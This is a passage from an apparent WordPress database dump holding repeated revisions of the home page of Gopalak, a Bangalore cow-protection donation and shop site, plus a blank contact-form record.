src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 11:28:13','2022-10-19 05:58:13','',1373,'https://gopalak.in/?p=1844',0,'revision','',0),(1845,1,'2022-10-19 11:28:48','2022-10-19 05:58:48','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 11:28:48','2022-10-19 05:58:48','',1373,'https://gopalak.in/?p=1845',0,'revision','',0),(1846,1,'2022-10-19 11:28:48','2022-10-19 05:58:48','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 11:28:48','2022-10-19 05:58:48','',1373,'https://gopalak.in/?p=1846',0,'revision','',0),(1847,1,'2022-10-19 11:28:48','2022-10-19 05:58:48','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 11:28:48','2022-10-19 05:58:48','',1373,'https://gopalak.in/?p=1847',0,'revision','',0),(1848,1,'2022-10-19 11:40:41','2022-10-19 06:10:41','{\"fields\":[],\"id\":\"1848\",\"field_id\":1,\"settings\":{\"form_title\":\"Blank Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"antispam\":\"1\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Blank Form Entry\",\"sender_name\":\"Gopalak\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"Thanks for contacting us! We will be in touch with you shortly.\",\"message_scroll\":\"1\",\"page\":\"1756\",\"redirect\":\"\"}},\"form_tags\":[]},\"meta\":{\"template\":\"blank\"}}','Blank Form','','publish','closed','closed','','blank-form','','','2022-10-19 11:40:46','2022-10-19 06:10:46','',0,'https://gopalak.in/?post_type=wpforms&#038;p=1848',0,'wpforms','',0),(1849,1,'2022-10-19 11:40:46','2022-10-19 